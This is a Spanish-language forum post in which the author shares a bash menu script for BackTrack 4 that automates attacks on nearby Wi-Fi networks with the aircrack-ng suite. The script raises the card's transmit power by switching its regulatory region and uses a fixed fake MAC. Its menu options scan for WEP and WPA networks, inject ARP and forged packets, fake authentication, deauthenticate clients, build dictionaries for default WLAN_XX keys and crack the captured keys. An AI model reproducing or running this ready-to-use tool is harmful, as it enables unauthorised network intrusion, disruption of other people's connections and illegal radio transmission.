Hace tiempo cree el siguiente script que quiero compartir con vosotros, el codigo bueno... probablemente pueda depurarse casi en su total, aun asi funciona.
Esta creado para funcionar en BT4 con Chipset RTL.
La tercera linea del script puede modificarse para cambiarel chipset,
wlandecrypter esta implementado en el script aunque debe encontrarse en /usr/sbin.
Espero mejoras y demas.
Como comente a ChimoC he creado un blog para temas de scripting y de tecnicas de nivel medio alto en el que me gustaria que participaseis todos.
Seguire aportando aqui las cosas que me ronden la cabeza.
Un saludo,
Si no puedo poner este enlace, borrar unicamente esta parte pero no borreis mi aporte,
Gracias
http://btcode.blogspot.com
Citar
Código
#!/bin/bash airmon-ng stop mon0 >> /dev/null clear RTL8187=`airmon-ng |grep "rtl" |awk '{print $1}'` echo [*] Cambiando la region de la tarjeta... iw reg set BO sleep 2 echo [*] Cambiando la potencia maxima a la tarjeta iwconfig $RTL8187 txpower 30 sleep 2 echo [*] Habilitando Modo Monitor... sleep 2 airmon-ng start $RTL8187 >> /dev/null echo [*] Modo Monitor Habilitado sleep 2 echo [*] Falsficando Mac Address sleep 2 echo [*] Mac Address Falsificada sleep 2 echo echo clear monitor=`ifconfig |grep "mon0" |awk '{print $1}'` mimac=00:11:22:33:44:55 rm out* rm rep* rm *.xor rm *.diccionario rm *-request rm temp* while : do clear echo echo "1. Escanear todas las redes con cifrado WEP " echo "2. Escanear todas las redes con cifrado WPA " echo "3. Escanear una red en particular" echo "4. Lanzar Airodump-ng " echo "5. Lanzar Aireplay-ng modo Selectivo" echo "6. Lanzar Aireplay-ng modo inyectar ARP" echo "7. Lanzar Aireplay-ng modo asociacion falsa V1" echo "8. Lanzar Aireplay-ng modo asociacion falsa V2" echo "9. Lanzar Aireplay-ng modo asociacion falsa V3" echo "10. Lanzar Aireplay-ng para obtener el PRGA" echo "11. Lanzar Aireplay-ng fragmentado para obtener PRGA" echo "12. Lanzar Packetforge-ng para crear un paquete ARP" echo "13. Lanzar Aireplay-ng para inyectar el paquete creado" echo "14. Lanzar Aireplay-ng para realizar una denegacion " echo "15. Crear un diccionario para redes WLAN_XX" echo "16. Lanzar Aircrack-ng para crackear la password" echo "17. Lanzar Aircrack-ng PTW para crackear la password" echo "18. Lanzar Aircrack-ng para crackear una password WLAN_XX" echo "19. Cambiar Mac Asociada" echo "20. Probar Si la tarjeta Inyecta correctamente" echo "21. Modificar la sensibilidad de la tarjeta" echo "22. Salir" echo "" echo "Elige una opcion" read opt case $opt in 1) xterm -geometry 90x15+500+0 -fg yellow -bg black -hold -title "Esnifando paquetes" -e airodump-ng $monitor -a --encrypt wep -w temp &;; 2) xterm -geometry 90x15+500+0 -fg yellow -bg black -hold -title "Esnifando paquetes" -e airodump-ng $monitor -a --encrypt wpa -w temp &;; 3) cat temp-01.csv | awk '{print $1,$20,$6}' >> temp-00001.csv; clear; cat temp-00001.csv; echo "Selecciona el Bssid"; read macap; echo "Selecciona el Essid" read nombreap echo "Selecciona Canal"; read canal; killall xterm; rm temp-*;; 4) xterm -hold -geometry 90x15+500+0 -fg yellow -bg black -title "Esnifando Paquetes" -e airodump-ng $monitor -a --bssid $macap -c $canal -w out &;; 5) xterm -hold -geometry 90x15+500+200 -fg yellow -bg black -title "Ataque Selectivo" -e aireplay-ng -2 -p 0841 -m 68 -n 86 -c FF:FF:FF:FF:FF:FF -b $macap -h $mimac $monitor &;; 6) xterm -hold -geometry 90x15+500+200 -fg yellow -bg black -title "Inyectando Arp" -e aireplay-ng -3 -b $macap -h $mimac $monitor &;; 7) xterm -geometry 90x15+0+0 -fg yellow -bg black -title "Asociando a $nombreap" -e aireplay-ng -1 0 -a $macap -h $mimac $monitor &;; 8) xterm -geometry 90x15+0+200 -fg yellow -bg black -title "Asociando a $nombreap" -e aireplay-ng -1 6000 -o 1 -q 10 -a $macap -h $mimac $monitor &;; 9) echo "Seleccina el numero de paquetes para la autenticacion"; read num; xterm -geometry 90x15+0+200 -fg yellow -bg black -title "Asociando a $nombreap con $num paquetes" -e aireplay-ng -1 0 -a $macap -h $mimac -o $num $monitor &;; 10) xterm -geometry 90x15+500+400 -fg yellow -bg black -title "Creando XOR" -e aireplay-ng -4 -b $macap -h $mimac $monitor &;; 11) xterm -geometry 90x15+500+400 -fg yellow -bg black -title "Creando XOR" -e aireplay-ng -5 -b $macap -h $mimac $monitor &;; 12) packetforge-ng -0 -a $macap -h $mimac -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request &;; 13) xterm -geometry 90x15+500+400 -fg yellow -bg black -hold -title "Inyectando Paquete especial" -e aireplay-ng -2 -r arp-request -h $mimac $monitor &;; 14) xterm -geometry 90x15+0+200 -fg yellow -bg black -title "Deautenticando a $mimac" -e aireplay-ng -0 1 -a $macap -c $mimac $monitor &;; 15) xterm -e wlandecrypter $macap $nombreap $nombreap.diccionario;; 16) xterm -geometry 90x15+0+400 -fg yellow -bg black -hold -title "Crackeando $nombreap" -e aircrack-ng -a 1 *.cap;; 17) xterm -geometry 90x15+0+400 -fg yellow -bg black -hold -title "Crackeando $nombreap" -e aircrack-ng -a 1 -P 2 *.cap;; 18) xterm -geometry 90x15+0+400 -fg yellow -bg black -hold -title "Crackeando $nombreap" -e aircrack-ng -a 1 *.cap -w $nombreap.diccionario;; 19) echo "Escribe la nueva Mac Asociada"; read mimac;; 20) xterm -geometry 90x15+0+400 -fg yellow -bg black -hold -title "Probando Inyeccion" -e aireplay-ng -9 -a $macap -e $nombreap $monitor &;; 21) echo "Selecciona la sensibilidad"; echo "1M Mayor sensibilidad o 54M Mayor alcance"; read sens; iwconfig $monitor rate $sens;; 22) exit 1;; *) echo "la opcion $opt no es valida, usa una entre 1 - 22"; echo "Presiona enter para continuar" read enterKey;; esac done